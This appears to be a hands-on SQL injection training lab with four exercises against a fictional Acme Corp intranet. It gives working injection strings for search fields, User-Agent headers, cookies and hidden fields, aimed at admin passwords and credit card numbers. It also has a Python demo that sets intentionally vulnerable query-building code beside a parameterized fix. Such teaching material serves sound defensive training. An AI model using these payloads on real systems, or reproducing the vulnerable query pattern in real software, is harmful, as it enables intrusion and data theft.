Real-World Attack Vectors
Injection surfaces are everywhere
Rolling Thunder Security · Module 05 · Lab 07
Beyond the Login Form
Most SQL injection tutorials only show login bypasses. In reality, injection surfaces lurk in every piece of user-controlled data that touches a database query. Developers often assume that certain inputs are "safe" because they are not directly typed by the user, but the browser sends them all the same.
Every one of these vectors has been exploited in real-world breaches:
▶ Search fields
▶ HTTP headers
▶ Cookie values
▶ Hidden form fields
▶ URL parameters
▶ JSON / XML APIs
▶ Dropdown menus
▶ User-Agent / Referer
Lab 1 of 4
Search Field Injection
Scenario: You have access to Acme Corp's internal knowledge base search. The search bar queries an articles table. Your goal: use the search to extract user email addresses from a completely different table.
Key detail: Your input appears twice in the query (once for title, once for content). Your injection must account for both injection points.
SELECT title, content FROM articles
WHERE title LIKE '%[YOUR INPUT]%'
OR content LIKE '%[YOUR INPUT]%'
Think about closing the first LIKE with %', then using UNION SELECT to pull from the users table. Remember you need to handle the second injection point too. The second LIKE's opening '% needs to be commented out with --.
Try:
%' UNION SELECT username, email FROM users --
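Added example, not part of the lab: the Lab 1 search query built two ways in Python on SQLite, the string-concatenated form the scenario describes beside a parameterized form that binds the wildcard pattern once per LIKE clause. The articles and users tables use the column names from the lab; the rows are constructed sample data and sqlite3 is an assumed engine.

```python
import sqlite3

# Constructed sample schema mirroring the lab's articles and users tables.
SAMPLE_DATA = """
CREATE TABLE articles (title TEXT, content TEXT);
CREATE TABLE users (username TEXT, email TEXT);
INSERT INTO articles VALUES ('VPN setup', 'How to configure the VPN client');
INSERT INTO articles VALUES ('Expense policy', 'Submit receipts within 30 days');
INSERT INTO users VALUES ('alice', 'alice@acmecorp.local');
INSERT INTO users VALUES ('bob', 'bob@acmecorp.local');
"""


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SAMPLE_DATA)
    return db


def search_vulnerable(db, term):
    # The lab's query built by string concatenation. The term lands inside
    # two LIKE patterns, so a single quote in it changes the SQL structure.
    sql = ("SELECT title, content FROM articles "
           f"WHERE title LIKE '%{term}%' OR content LIKE '%{term}%'")
    return db.execute(sql).fetchall()


def search_parameterized(db, term):
    # Hardened form: the wildcard pattern is built in Python and bound once
    # per LIKE clause. The driver sends it as data, so the quote and the
    # UNION are compared literally against article text, never executed.
    pattern = f"%{term}%"
    sql = ("SELECT title, content FROM articles "
           "WHERE title LIKE ? OR content LIKE ?")
    return db.execute(sql, (pattern, pattern)).fetchall()


# The lab's own payload: closes the first LIKE, appends a UNION over users,
# and comments out the second LIKE with --.
LAB_PAYLOAD = "%' UNION SELECT username, email FROM users --"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable   :", search_vulnerable(db, LAB_PAYLOAD))   # users rows leak
    print("parameterized:", search_parameterized(db, LAB_PAYLOAD))  # []
```

Binding stops the input from altering the statement, but % and _ inside the term still act as LIKE wildcards, so add an ESCAPE clause if the search must be literal.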
Lab 2 of 4
Header Injection
Scenario: Acme Corp logs every page visit to an access_log table, storing the User-Agent header directly via string concatenation. Your goal: craft a malicious User-Agent to extract the admin password from the users table.
Key insight: The server trusts HTTP headers because "users can't edit them." But with any proxy tool (Burp Suite, browser DevTools), headers are fully controllable.
INSERT INTO access_log (page, user_agent, ip)
VALUES ('/dashboard', '[USER-AGENT]', '10.0.1.42')
GET /dashboard HTTP/1.1
Host: intranet.acmecorp.local
User-Agent:
Accept: text/html, application/xhtml+xml
Cookie: session=abc123def456
You need to close the VALUES clause, then start a new SELECT statement. The User-Agent value is inside single quotes, so close the quote first.
Try:
Mozilla/5.0', '10.0.1.42'); SELECT password FROM users WHERE username='admin' --
This closes the INSERT, then runs a separate SELECT to pull the admin password.
Lab 3 of 4
Cookie Monster
Scenario: Acme Corp's intranet uses a cookie called user_id to identify who is logged in. The cookie value is plugged directly into a SQL query with no parameterization. You are currently logged in as user 3. Your goal: extract all users' data by modifying the cookie.
Bonus challenge: After seeing all users, try a UNION-based injection to extract credit card numbers.
SELECT username, email, role FROM users
WHERE id = [COOKIE_VALUE]
Step 1: The cookie value is a number with no quotes around it. Use OR 1=1 to make the WHERE clause always true.
Try:
3 OR 1=1
Step 2 (bonus): Use a UNION to pull credit card data:
3 UNION SELECT card_number, card_holder, exp_date FROM credit_cards
Lab 4 of 4
The Hidden Field
Scenario: Acme Corp's product review form uses a hidden field product_id to track which product is being reviewed. Developers assumed hidden fields are safe because users "cannot see them." Your goal: inject through the hidden field to extract the admin password.
Key insight: Any user can open browser DevTools (F12), find hidden fields, and change their values. "Hidden" means invisible, not immutable.
INSERT INTO reviews (product_id, review_text, rating)
VALUES ([PRODUCT_ID], '[REVIEW]', 5)
The product_id is a numeric field with no quotes. You can close the VALUES clause and inject a subquery.
Try setting product_id to:
1, (SELECT password FROM users WHERE username='admin'), 5) --
This makes the full query insert the admin password as the review_text.